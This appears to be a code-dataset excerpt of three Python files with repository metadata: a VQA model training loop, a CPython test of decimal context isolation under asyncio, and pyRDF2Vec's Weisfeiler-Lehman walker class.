# Paper uses AdaDelta
if opt == 'Adadelta':
optim = torch.optim.Adadelta(model.parameters(), rho=0.95, eps=1e-6, weight_decay=wd)
elif opt == 'RMSprop':
optim = torch.optim.RMSprop(model.parameters(), lr=0.01, alpha=0.99, eps=1e-08, weight_decay=wd, momentum=0, centered=False)
elif opt == 'Adam':
optim = torch.optim.Adam(model.parameters(), lr=0.001, betas=(0.9, 0.999), eps=1e-08, weight_decay=wd)
else:
optim = torch.optim.Adamax(model.parameters(), weight_decay=wd)
logger = utils.Logger(os.path.join(output, 'log.txt'))
best_eval_score = 0
for epoch in range(num_epochs):
total_loss = 0
train_score = 0
t = time.time()
correct = 0
for i, (v, b, q, a) in enumerate(train_loader):
v = Variable(v).cuda()
b = Variable(b).cuda() # boxes not used
q = Variable(q).cuda()
a = Variable(a).cuda() # true labels
pred = model(v, b, q, a)
loss = instance_bce_with_logits(pred, a)
loss.backward()
nn.utils.clip_grad_norm(model.parameters(), 0.25)
optim.step()
optim.zero_grad()
batch_score = compute_score_with_logits(pred, a.data).sum()
total_loss += loss.data[0] * v.size(0)
train_score += batch_score
total_loss /= len(train_loader.dataset)
train_score = 100 * train_score / len(train_loader.dataset)
model.train(False)
eval_score, bound, V_loss = evaluate(model, eval_loader)
model.train(True)
logger.write('epoch %d, time: %.2f' % (epoch, time.time()-t))
logger.write('\ttrain_loss: %.3f, score: %.3f' % (total_loss, train_score))
logger.write('\teval loss: %.3f, score: %.3f (%.3f)' % (V_loss, 100 * eval_score, 100 * bound))
if eval_score > best_eval_score:
model_path = os.path.join(output, 'model.pth')
torch.save(model.state_dict(), model_path)
best_eval_score = eval_score
def evaluate(model, dataloader):
score = 0
V_loss = 0
upper_bound = 0
num_data = 0
for v, b, q, a in iter(dataloader):
v = Variable(v, volatile=True).cuda()
b = Variable(b, volatile=True).cuda()
q = Variable(q, volatile=True).cuda()
a = Variable(a, volatile=True).cuda()
pred = model(v, b, q, None)
loss = instance_bce_with_logits(pred, a)
V_loss += loss.data[0] * v.size(0)
batch_score = compute_score_with_logits(pred, a.data).sum()
score += batch_score
upper_bound += (a.max(1)[0]).sum()
num_data += pred.size(0)
score = score / len(dataloader.dataset)
V_loss /= len(dataloader.dataset)
upper_bound = upper_bound / len(dataloader.dataset)
return score, upper_bound, V_loss
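# Minimal usage sketch. The dataset/model construction below is hypothetical: the
# names VQAFeatureDataset-style `train_dset`/`eval_dset` and `build_model` stand in
# for whatever the surrounding repository provides; only train()/evaluate() above
# are defined in this file.
#
#   from torch.utils.data import DataLoader
#
#   train_loader = DataLoader(train_dset, batch_size=512, shuffle=True, num_workers=1)
#   eval_loader = DataLoader(eval_dset, batch_size=512, shuffle=False, num_workers=1)
#   model = build_model(train_dset).cuda()
#   train(model, train_loader, eval_loader, num_epochs=30, output='saved_models',
#         opt='Adamax', wd=0)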
| 33.942857 | 132 | 0.617284 | ["MIT"] | SinghJasdeep/Attention-on-Attention-for-VQA | train.py | 3,564 | Python |
import asyncio
import decimal
import unittest
class DecimalContextTest(unittest.TestCase):
def test_asyncio_task_decimal_context(self):
async def fractions(t, precision, x, y):
with decimal.localcontext() as ctx:
ctx.prec = precision
a = decimal.Decimal(x) / decimal.Decimal(y)
await asyncio.sleep(t)
b = decimal.Decimal(x) / decimal.Decimal(y ** 2)
return a, b
async def main():
r1, r2 = await asyncio.gather(
fractions(0.1, 3, 1, 3), fractions(0.2, 6, 1, 3))
return r1, r2
r1, r2 = asyncio.run(main())
self.assertEqual(str(r1[0]), '0.333')
self.assertEqual(str(r1[1]), '0.111')
self.assertEqual(str(r2[0]), '0.333333')
self.assertEqual(str(r2[1]), '0.111111')
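# The assertions above hold because, since Python 3.7, the decimal module stores its
# active context in a contextvars.ContextVar: each asyncio task runs in its own
# context copy, so the precision set via decimal.localcontext() survives the
# `await asyncio.sleep(t)` suspension point and does not leak between the two tasks.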
| 29.7 | 66 | 0.535354 | ["BSD-3-Clause"] | DISOGitHub/FastCAE | output/python37/Lib/test/test_asyncio/test_context.py | 891 | Python |
from collections import defaultdict
from hashlib import md5
from typing import DefaultDict, Dict, List, Set, Union
import attr
from pyrdf2vec.graphs import KG, Vertex
from pyrdf2vec.typings import Entities, EntityWalks, SWalk
from pyrdf2vec.walkers import RandomWalker
@attr.s
class WLWalker(RandomWalker):
"""Weisfeiler-Lehman walking strategy which relabels the nodes of the
extracted random walks, providing additional information about the entity
representations only when a maximum number of walks is not specified.
Attributes:
_inv_label_map: Stores the mapping of the inverse labels.
Defaults to defaultdict.
_is_support_remote: True if the walking strategy can be used with a
remote Knowledge Graph, False Otherwise.
Defaults to False.
        _label_map: Stores the mapping of the labels.
Defaults to defaultdict.
kg: The global KG used later on for the worker process.
Defaults to None.
max_depth: The maximum depth of one walk.
max_walks: The maximum number of walks per entity.
Defaults to None.
md5_bytes: The number of bytes to keep after hashing objects in
MD5. Hasher allows to reduce the memory occupied by a long text. If
md5_bytes is None, no hash is applied.
Defaults to 8.
random_state: The random state to use to keep random determinism with
the walking strategy.
Defaults to None.
sampler: The sampling strategy.
Defaults to UniformSampler.
wl_iterations: The Weisfeiler Lehman's iteration.
Defaults to 4.
"""
wl_iterations = attr.ib(
kw_only=True,
default=4,
type=int,
validator=attr.validators.instance_of(int),
)
_is_support_remote = attr.ib(
init=False, repr=False, type=bool, default=False
)
_inv_label_map = attr.ib(
init=False,
repr=False,
type=DefaultDict["Vertex", Dict[Union[str, int], Union[str, int]]],
factory=lambda: defaultdict(dict),
)
_label_map = attr.ib(
init=False,
repr=False,
type=DefaultDict["Vertex", Dict[int, str]],
factory=lambda: defaultdict(dict),
)
def _create_label(self, kg: KG, vertex: Vertex, n: int) -> str:
"""Creates a label according to a vertex and its neighbors.
        Args:
            kg: The Knowledge Graph.
                The graph from which the neighborhoods are extracted for the
                provided entities.
            vertex: The vertex to get its neighbors to create the suffix.
            n: The index of the neighbor.
        Returns:
            The label created for the vertex.
"""
if len(self._label_map) == 0:
self._weisfeiler_lehman(kg)
suffix = "-".join(
sorted(
set(
[
self._label_map[neighbor][n - 1]
for neighbor in kg.get_neighbors(
vertex, is_reverse=True
)
]
)
)
)
return f"{self._label_map[vertex][n - 1]}-{suffix}"
def _weisfeiler_lehman(self, kg: KG) -> None:
"""Performs Weisfeiler-Lehman relabeling of the vertices.
Args:
kg: The Knowledge Graph.
The graph from which the neighborhoods are extracted for the
provided entities.
"""
for vertex in kg._vertices:
self._label_map[vertex][0] = vertex.name
self._inv_label_map[vertex][0] = vertex.name
for n in range(1, self.wl_iterations + 1):
for vertex in kg._vertices:
if self.md5_bytes:
self._label_map[vertex][n] = str(
md5(
self._create_label(kg, vertex, n).encode()
).digest()[: self.md5_bytes]
)
else:
self._label_map[vertex][n] = str(
self._create_label(kg, vertex, n)
)
for vertex in kg._vertices:
for k, v in self._label_map[vertex].items():
self._inv_label_map[vertex][v] = k
def extract(
self, kg: KG, entities: Entities, verbose: int = 0
) -> List[List[SWalk]]:
"""Fits the provided sampling strategy and then calls the
private _extract method that is implemented for each of the
walking strategies.
Args:
kg: The Knowledge Graph.
entities: The entities to be extracted from the Knowledge Graph.
verbose: The verbosity level.
0: does not display anything;
1: display of the progress of extraction and training of walks;
2: debugging.
Defaults to 0.
Returns:
            The 2D list of extracted walks, with one list of walks per
            provided entity.
"""
self._weisfeiler_lehman(kg)
return super().extract(kg, entities, verbose)
def _map_wl(self, entity: Vertex, pos: int, n: int) -> str:
"""Maps certain vertices to MD5 hashes to save memory. For entities of
interest (provided by the user to the extract function) and predicates,
the string representation is kept.
Args:
entity: The entity to be mapped.
pos: The position of the entity in the walk.
n: The iteration number of the WL algorithm.
Returns:
A hash (string) or original string representation.
"""
if entity.name in self._entities or pos % 2 == 1:
return entity.name
else:
return self._label_map[entity][n]
def _extract(self, kg: KG, entity: Vertex) -> EntityWalks:
"""Extracts random walks for an entity based on a Knowledge Graph.
Args:
kg: The Knowledge Graph.
entity: The root node to extract walks.
Returns:
A dictionary having the entity as key and a list of tuples as value
corresponding to the extracted walks.
"""
canonical_walks: Set[SWalk] = set()
for n in range(self.wl_iterations + 1):
for walk in self.extract_walks(kg, entity):
canonical_walk: List[str] = [
self._map_wl(vertex, i, n) for i, vertex in enumerate(walk)
]
canonical_walks.add(tuple(canonical_walk))
return {entity.name: list(canonical_walks)}
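# Minimal usage sketch (hypothetical file path and entity IRI; a local KG file is
# used because _is_support_remote is False for this walker, and max_walks is left
# unset so the WL relabelling adds information, as noted in the class docstring):
#
#   from pyrdf2vec import RDF2VecTransformer
#   from pyrdf2vec.embedders import Word2Vec
#   from pyrdf2vec.graphs import KG
#
#   kg = KG("samples/mutag/mutag.owl")
#   entities = ["http://dl-learner.org/carcinogenesis#d1"]
#   transformer = RDF2VecTransformer(
#       Word2Vec(),
#       walkers=[WLWalker(max_depth=4, wl_iterations=4)],
#   )
#   embeddings, literals = transformer.fit_transform(kg, entities)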
| 34.716495 | 79 | 0.580995 | ["MIT"] | vishalbelsare/pyRDF2Vec | pyrdf2vec/walkers/weisfeiler_lehman.py | 6,735 | Python |